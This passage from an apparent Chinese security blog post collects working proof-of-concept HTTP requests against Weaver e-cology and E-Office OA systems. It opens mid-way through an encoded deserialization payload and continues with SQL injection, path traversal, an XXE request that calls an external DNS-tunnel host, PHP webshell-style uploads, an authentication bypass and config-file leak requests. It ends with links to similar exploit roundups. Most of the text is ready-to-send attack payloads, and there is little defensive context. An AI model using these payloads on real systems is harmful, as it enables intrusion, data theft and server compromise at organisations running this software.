32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#116;&#114;&#97;&#110;&#115;&#102;&#101;&#114;&#70;&#108;&#97;&#118;&#111;&#114;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#97;&#116;&#97;&#72;&#97;&#110;&#100;&#108;&#101;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#76;&#101;&#110;&#62;&#48;&#60;&#47;&#100;&#97;&#116;&#97;&#76;&#101;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#47;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#39;&#47;&#62;&#10;&#32;&#32;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;&#10;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;</web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>

泛微e-cology getE9DevelopAllNameValue2任意文件读取漏洞

GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

泛微e-Weaver SQL注入


GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1
Host:

泛微OA e-cology前台接口SQL注入漏洞


POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host:***
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

泛微OA E-Cology9 browser.jsp SQL注入漏洞(CNVD-2023-12632)


POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
DNT: 1
Connection: close
Cookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028a
Upgrade-Insecure-Requests: 1

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%36%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%36%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

泛微 e-cology 前台SQL注入漏洞

app.name="泛微 e-cology 9.0 OA"

验证poc:

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close        

fileid=1+WAITFOR+DELAY+%270:0:2%27&isFromOutImg=1

 泛微E-cology XML外部实体注入漏洞

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: 
Content-Type: application/xml
Content-Length: 53

<M>
    <syscode>
        666
    </syscode>

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:****
Content-Type: application/xml


POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1
Host:****
Content-Type: application/xml

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 35
Content-Type: application/xml
Accept-Encoding: gzip


<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY % d SYSTEM "http://wutvavcfzj.dnstunnel.run">
    %d;
]>
<a>&xxe;</a>

 

泛微 e-cology  ofsLogin任意用户登录漏洞

/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp

泛微e-cology CheckServer.jsp SQL注入

/mobile/plugin/CheckServer.jsp?type=mobileSetting

泛微E-Office系列

泛微 E-Office文件上传漏洞(CVE-2023-2523)


POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 
Host:your-ip  
Cache-Control:max-age=0  
Upgrade-Insecure-Requests:1  
Origin:null  
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="file"; filename=""
Content-Type:application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

泛微 E-Office 任意文件下载:

/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\

泛微E-Office信息泄露漏洞(CVE-2023-2766)

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip



GET /building/config/config.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

泛微E-Office文件上传漏洞(CVE-2023-2648)

 Poc (POST)

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: test
Connection: close
Content-Length: 491
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

 

 http://10.211.55.3:8082/attachment/1727543347/666.php

泛微E-Office UserSelect未授权访问漏洞


GET /UserSelect/ HTTP/1.1
Content-Type: application/josn

泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞


GET /mysql_config.ini HTTP/1.1
Content-Type: application/josn

yggcwhat
关注
0day蓝凌EIS智慧协同平台 Message SQL注入漏洞
ZeroDay001的博客
01-09 181
瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞这是一个集内容管理与发布于一体的智能平台,广服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
E-Cology getFileViewUrl SSRF漏洞复现
0xSec
07-09 2548
E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
软件漏洞-OA-汇总
weixin_30855099的博客
09-20 3404
SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 -loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.js...
文件上传漏洞(详解)
最新发布
xiexierong的博客
03-16 791
将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器收到请求并同意后,用户与Web服务器将建立连接,并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。
最新漏洞汇总----实时更新!!!_漏洞,2024年最新网络安全程序员必会
erthre的博客
04-16 2715
知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-tih2xQ74-1713254808442)]app.name=“ e-cology 9.0 OA”
最新漏洞汇总----实时更新!!!_漏洞,2024年最新为什么网络安全能最好地改变网络安全
2401_83974087的博客
04-14 1243
q=0.9!!Win64;x64;;v=b3;x64;;
云桥前台文件上传漏洞-202408
网络安全。
08-18 1654
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。
最新漏洞汇总----实时更新!!,网络安全开发知识体系
2201_75863152的博客
04-11 1013
title=“移动管理平台-企业管理”q=0.9!!
2024HW必修高危漏洞集合-v3.0
07-08
#### 二、漏洞汇总与分析 本节将详细介绍《2024HW必修高危漏洞集合_3.0》中列举的部分高危漏洞及其影响。 ##### 1. 远程代码执行漏洞 远程代码执行漏洞是HW攻防演练中最为常见的类型之一。这类漏洞允许攻击者在未...
【1day】e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 592
e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
2023年国家护网0day-poc/exp漏洞汇总(目前已更新到91个..实时更新中...)
08-21 4315
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
2021-OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
OA V8 SQL注入漏洞 漏洞描述 OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 OA V8 FOFA app=“-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
最新漏洞汇总----实时更新!!(1),阿里内部网络安全笔记火爆IT圈
m0_60666452的博客
04-07 1475
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
最新漏洞汇总----实时更新!!!_漏洞(1),腾讯大牛教你自己写网络安全框架
2401_83974087的博客
04-14 625
app.name=“ e-cology 9.0 OA”
最新漏洞汇总----实时更新!!!_漏洞(2),系统学网络安全从零开始
erthre的博客
04-16 1032
app.name=“ e-cology 9.0 OA”
e-cology WorkflowServiceXml SQL注入漏洞(POC)
m0_62584974的博客
07-16 1510
e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。分析:基于当前情报,漏洞可能被用于攻击e-Cology WorkflowServiceXml系统,建议更新系统补丁、加强输入验证和限制访问权限。更新e-Cology WorkflowServiceXml系统到最新版本。
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8408
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="-协同办公OA" SQL注入 在OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
【nday】2023hvv 漏洞合集
伏一
05-23 1051
【nday】2023hvv 漏洞合集
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值